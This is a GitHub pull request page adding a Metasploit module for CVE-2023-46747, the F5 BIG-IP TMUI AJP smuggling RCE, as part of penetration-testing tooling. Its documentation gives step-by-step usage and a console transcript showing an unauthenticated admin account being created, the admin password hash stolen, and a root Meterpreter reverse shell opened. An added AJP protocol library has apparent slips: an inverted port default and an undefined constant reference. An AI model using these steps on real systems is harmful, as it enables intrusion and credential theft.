Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Exploit For CVE-2023-46747 (F5 TMUI AJP Smuggling RCE) #18497

Merged
merged 9 commits into from
Nov 2, 2023
Merged

Add Exploit For CVE-2023-46747 (F5 TMUI AJP Smuggling RCE) #18497

Show file tree
Hide file tree
Changes from 6 commits
Commits
Show all changes
9 commits
Select commit Hold shift + click to select a range
04388d9
Initial commit of CVE-2023-46747
zeroSteiner Oct 30, 2023
c803d6e
Fetch the admin hash as a bonus
zeroSteiner Oct 31, 2023
714eeaa
Finish cleaning the exploit up
zeroSteiner Nov 1, 2023
0325291
Add the check method
zeroSteiner Nov 1, 2023
7b53592
Add module docs
zeroSteiner Nov 1, 2023
9c67b92
Rename the other TMUI RCE module
zeroSteiner Nov 1, 2023
d26742a
Add check code annotations, update AJP link
zeroSteiner Nov 2, 2023
cea4c1f
Feedback from module review
zeroSteiner Nov 2, 2023
27d86be
Remove the REPEATABLE_SESSION tag
zeroSteiner Nov 2, 2023
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
12 changes: 6 additions & 6 deletions ...s/exploit/linux/http/f5_bigip_tmui_rce.md → ...x/http/f5_bigip_tmui_rce_cve_2020_5902.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -52,11 +52,11 @@ Defaults to `/tmp`.
### F5 BIG-IP 14.1.2 in VMware Fusion

```
msf5 > use exploit/linux/http/f5_bigip_tmui_rce
msf5 > use exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/f5_bigip_tmui_rce) > options
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > options

Module options (exploit/linux/http/f5_bigip_tmui_rce):
Module options (exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902):

Name Current Setting Required Description
---- --------------- -------- -----------
Expand Down Expand Up @@ -87,11 +87,11 @@ Exploit target:
1 Linux Dropper


msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.249.179
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set rhosts 172.16.249.179
rhosts => 172.16.249.179
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.249.1
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(linux/http/f5_bigip_tmui_rce) > run
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > run

[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
Expand Down
76 changes: 76 additions & 0 deletions documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,76 @@
## Vulnerable Application

### Description

This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external,
unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new account to
execute a command payload.

Tested against the VMware OVA release of 16.1.2.1-0.0.10 and 17.0.0.1-0.0.4.

### Setup

Download BIGIP-17.0.0.1-0.0.4.ALL-vmware.ova and import it into your desired virtualization software.

The target does not need to be licensed to be vulnerable.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747`
4. Set the `RHOST`, `PAYLOAD` and payload-related options
5. Do: `run`
6. You should get a shell.

## Targets

### Command

This executes an OS command on the target device.

## Options

## Scenarios

### F5 BIG-IP 17.0.0.1-0.0.4

```
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set RHOSTS 192.168.159.32
RHOSTS => 192.168.159.32
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > check
[+] 192.168.159.32:443 - The target is vulnerable.
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444
[+] Admin user was created successfully. Credentials: UyPzjB - qu0k7MxIzIDlvS
[+] Retrieved the admin hash: $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5tLI9KSSr8M10
[*] Obtained login token: 4TAZKYHLZCHPQX3FC47VWNSEUA
[*] Sending stage (24768 bytes) to 192.168.159.32
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.32:35438) at 2023-11-01 16:36:04 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : f5test2.home.lan
OS : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022
Architecture : x64
Meterpreter : python/linux
meterpreter > pwd
/var/service/restjavad
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > creds
Credentials
===========

host origin service public private realm private_type JtR Format cracked_password
---- ------ ------- ------ ------- ----- ------------ ---------- ----------------
192.168.159.32 192.168.159.32 443/tcp (F5 BIG-IP TMUI) admin $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5t (TRUNCATED) Nonreplayable hash sha512,crypt

msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) >
```
128 changes: 128 additions & 0 deletions lib/rex/proto/apache_j_p.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,128 @@
# -*- coding: binary -*-

require 'bindata'

# @see: https://tomcat.apache.org/tomcat-3.3-doc/ApacheJP.html
zeroSteiner marked this conversation as resolved.
Show resolved Hide resolved
module Rex::Proto::ApacheJP
adfoster-r7 marked this conversation as resolved.
Show resolved Hide resolved
class ApacheJPBoolean < BinData::Primitive
endian :big

uint8 :data

def get
self.data != 0
end

def set(v)
self.data = v ? 1 : 0
end
end

class ApacheJPString < BinData::Primitive
endian :big

uint16 :len, value: -> { data.length }
stringz :data

def get
self.data
end

def set(v)
self.data = v
end
end

class ApacheJPReqHeaderName < BinData::Primitive
COMMON_HEADERS = %w{ accept accept-charset accept-encoding accept-language authorization connection content-type content-length cookie cookie2 host pragma referer user-agent }
endian :big

uint16 :len_or_code
stringz :data, onlyif: -> { len_or_code < 0xa000 }

def get
if len_or_code >= 0xa000
COMMON_HEADERS[(len_or_code.to_i & 0xff) - 1]
else
self.data
end
end

def set(v)
if (idx = COMMON_HEADERS.index(v))
self.len_or_code = 0xa000 | (idx + 1)
else
raise RuntimeError if v.length >= 0xa000

self.len_or_code = v.length
self.data = v
end
end
end

class ApacheJPRequestHeader < BinData::Record
endian :big

apache_jp_req_header_name :header_name
apache_jp_string :header_value
end

class ApacheJPRequestAttribute < BinData::Record
CODE_CONTEXT = 1
CODE_SERVLET_PATH = 2
CODE_REMOTE_USER = 3
CODE_AUTH_TYPE = 4
CODE_QUERY_STRING = 5
CODE_JVM_ROUTE = 6
CODE_SSL_CERT = 7
CODE_SSL_CIPHER = 8
CODE_SSL_SESSION = 9
CODE_REQ_ATTRIBUTE = 10
CODE_TERMINATOR = 0xff

endian :big

uint8 :code
apache_jp_string :attribute_value, onlyif: -> { code != CODE_TERMINATOR }
end

# @see: https://tomcat.apache.org/tomcat-3.3-doc/ApacheJP.html#prefix-codes
class ApacheJPForwardRequest < BinData::Record
HTTP_METHOD_OPTIONS = 1
HTTP_METHOD_GET = 2
HTTP_METHOD_HEAD = 3
HTTP_METHOD_POST = 4
HTTP_METHOD_PUT = 5
HTTP_METHOD_DELETE = 6
HTTP_METHOD_TRACE = 7
HTTP_METHOD_PROPFIND = 8
HTTP_METHOD_PROPPATCH = 9
HTTP_METHOD_MKCOL = 10
HTTP_METHOD_COPY = 11
HTTP_METHOD_MOVE = 12
HTTP_METHOD_LOCK = 13
HTTP_METHOD_UNLOCK = 14
HTTP_METHOD_ACL = 15
HTTP_METHOD_REPORT = 16
HTTP_METHOD_VERSION_CONTROL = 17
HTTP_METHOD_CHECKIN = 18
HTTP_METHOD_CHECKOUT = 19
HTTP_METHOD_UNCHECKOUT = 20
HTTP_METHOD_SEARCH = 21

endian :big

uint8 :prefix_code, value: 2
uint8 :http_method
apache_jp_string :protocol, initial_value: 'HTTP/1.1'
apache_jp_string :req_uri
apache_jp_string :remote_addr
apache_jp_string :remote_host
apache_jp_string :server_name
uint16 :server_port, initial_value: -> { is_ssl ? 80 : 443 }
apache_jp_boolean :is_ssl, initial_value: false
uint16 :num_headers, initial_value: -> { headers.length }
array :headers, type: :apache_jp_request_header, initial_length: :num_headers
array :attributes, type: :apache_jp_request_attribute, read_until: -> { element.code == ApacheJPRequestAttribute::TERMINATOR }
end
end
2 changes: 2 additions & 0 deletions .../exploits/linux/http/f5_bigip_tmui_rce.rb → ...x/http/f5_bigip_tmui_rce_cve_2020_5902.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,8 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
include Msf::Exploit::Deprecated
moved_from 'exploit/linux/http/f5_bigip_tmui_rce'
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

👍


def initialize(info = {})
super(
Expand Down
Loading